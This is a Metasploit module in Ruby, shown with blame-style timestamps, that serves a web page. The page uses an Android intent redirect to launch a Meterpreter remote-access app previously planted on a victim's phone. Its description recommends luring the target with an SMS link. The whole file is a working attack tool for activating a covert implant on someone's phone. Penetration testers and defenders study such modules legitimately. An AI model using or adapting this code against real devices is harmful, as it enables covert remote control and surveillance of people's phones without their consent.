2015-08-27 19:36:55 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-08-27 19:36:55 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2015-08-27 19:36:55 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Android Meterpreter Browsable Launcher",
|
|
|
|
'Description' => %q{
|
|
|
|
This module allows you to open an android meterpreter via a browser. An Android
|
|
|
|
meterpreter must be installed as an application beforehand on the target device
|
|
|
|
in order to use this.
|
2017-03-07 22:55:06 +00:00
|
|
|
|
|
|
|
For best results, you can consider using the auxiliary/client/sms/send_text to
|
|
|
|
trick your target into opening the malicious link, and wake up Meterpreter.
|
2015-08-27 19:36:55 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'sinn3r' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://developer.android.com/reference/android/content/Intent.html#CATEGORY_BROWSABLE' ]
|
|
|
|
]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
exploit
|
|
|
|
end
|
|
|
|
|
|
|
|
def html
|
|
|
|
%Q|
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<script>
|
|
|
|
location.href = "intent://my_host#Intent;scheme=metasploit;action=android.intent.action.VIEW;end";
|
|
|
|
</script>
|
|
|
|
<noscript>
|
|
|
|
<meta http-equiv="refresh" content="1; url=intent://my_host#Intent;scheme=metasploit;action=android.intent.action.VIEW;end">
|
|
|
|
</noscript>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
print_status("Sending HTML...")
|
|
|
|
send_response(cli, html)
|
|
|
|
end
|
|
|
|
end
|